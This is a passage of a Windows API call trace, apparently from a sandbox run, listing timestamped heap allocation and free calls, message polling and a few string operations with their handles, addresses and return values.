dwFlags=0x0, lpMem=0x24aa3f8 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa380 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1978 | out: hHeap=0x25c0000) returned 1 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa380 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa398 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1978 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3c8 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1988 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1978 | out: hHeap=0x25c0000) returned 1 [0145.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa380 | out: hHeap=0x25c0000) returned 1 [0145.434] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.434] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1978 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa380 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa398 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1988 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3c8 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1998 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa410 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3f8 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa470 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa428 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa440 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa458 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b19a8 [0145.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3e0 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa470 | out: hHeap=0x25c0000) returned 1 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3f8 | out: hHeap=0x25c0000) returned 1 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa428 | out: hHeap=0x25c0000) returned 1 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa440 | out: hHeap=0x25c0000) returned 1 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: hHeap=0x25c0000) returned 1 [0145.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.435] lstrlenW (lpString="20") returned 2 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3e0 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3c8 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1988 | out: hHeap=0x25c0000) returned 1 [0145.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3c8 [0145.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1988 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa380 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1978 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3c8 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1988 | out: hHeap=0x25c0000) returned 1 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.436] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0145.436] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1988 [0145.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1988 | out: hHeap=0x25c0000) returned 1 [0145.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3c8 [0145.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3c8 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa2f0 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa2d8 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0830 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0808 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa368 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa308 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0858 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa350 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa338 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b08a8 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1968 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0880 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa2c0 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1928 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bb8 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa2a8 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa290 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d08 | out: hHeap=0x25c0000) returned 1 [0145.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1918 | out: hHeap=0x25c0000) returned 1 [0145.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0145.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0145.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cf0 | out: hHeap=0x25c0000) returned 1 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cf0 [0145.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0880 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d08 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1918 [0145.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d08 | out: hHeap=0x25c0000) returned 1 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b08a8 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d08 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa290 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1928 [0145.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3b0 | out: hHeap=0x25c0000) returned 1 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0858 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1968 [0145.438] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0858 | out: hHeap=0x25c0000) returned 1 [0145.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1968 | out: hHeap=0x25c0000) returned 1 [0145.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3b0 [0145.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1968 [0145.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2a8 [0145.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bb8 [0145.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0145.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0145.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0145.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2c0 [0145.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0145.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa338 [0145.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0858 [0145.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa350 [0145.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0145.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa350 | out: hHeap=0x25c0000) returned 1 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0808 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa350 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa308 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0145.444] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa368 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0145.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa368 | out: hHeap=0x25c0000) returned 1 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0830 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa368 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2d8 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1988 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b08d0 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2f0 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1978 [0145.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa2f0 | out: hHeap=0x25c0000) returned 1 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b08f8 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa2f0 [0145.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3c8 [0145.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0830 | out: hHeap=0x25c0000) returned 1 [0145.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0145.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa368 | out: hHeap=0x25c0000) returned 1 [0145.444] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b0830 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa368 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa380 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b19a8 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa398 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa3e0 [0145.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1998 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3e0 | out: hHeap=0x25c0000) returned 1 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.445] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3f8 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa428 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa470 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa488 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa440 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19b8 | out: hHeap=0x25c0000) returned 1 [0145.446] lstrlenW (lpString="20") returned 2 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa4a0 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa4b8 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3e0 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.446] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.446] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19b8 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19b8 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19b8 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa440 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa4a0 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa488 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa470 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa4b8 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.447] lstrlenW (lpString="30") returned 2 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa428 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19b8 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3f8 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3e0 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa458 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1998 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3e0 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19a8 | out: hHeap=0x25c0000) returned 1 [0145.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa398 | out: hHeap=0x25c0000) returned 1 [0145.447] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.447] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa4b8 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa428 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa470 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa488 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa3f8 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19b8 | out: hHeap=0x25c0000) returned 1 [0145.448] lstrlenW (lpString="20") returned 2 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa4a0 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b19c8 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa440 | out: hHeap=0x25c0000) returned 1 [0145.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa410 | out: 